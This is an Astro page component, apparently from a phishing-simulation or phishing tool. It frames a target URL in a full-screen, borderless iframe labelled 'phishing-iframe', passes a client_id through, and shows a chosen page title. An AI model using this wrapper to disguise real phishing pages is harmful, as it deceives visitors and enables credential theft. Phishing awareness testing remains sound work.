---
const { title, target } = Astro.props;

// Get parameters to pass through to the iframe
const client_id = Astro.url.searchParams.get("client_id");
const targetUrl = target + (client_id ? `?client_id=${client_id}` : "");
---

<!doctype html>
<html lang="es">
    <head>
        <meta charset="UTF-8" />
        <meta name="viewport" content="width=device-width, initial-scale=1.0" />
        <title>{title}</title>
        <style>
            body,
            html {
                margin: 0;
                padding: 0;
                height: 100%;
                overflow: hidden;
            }
            iframe {
                border: none;
                width: 100%;
                height: 100vh;
                display: block;
            }
        </style>
    </head>
    <body>
        <iframe id="phishing-iframe" src={targetUrl} title={title}></iframe>
    </body>
</html>
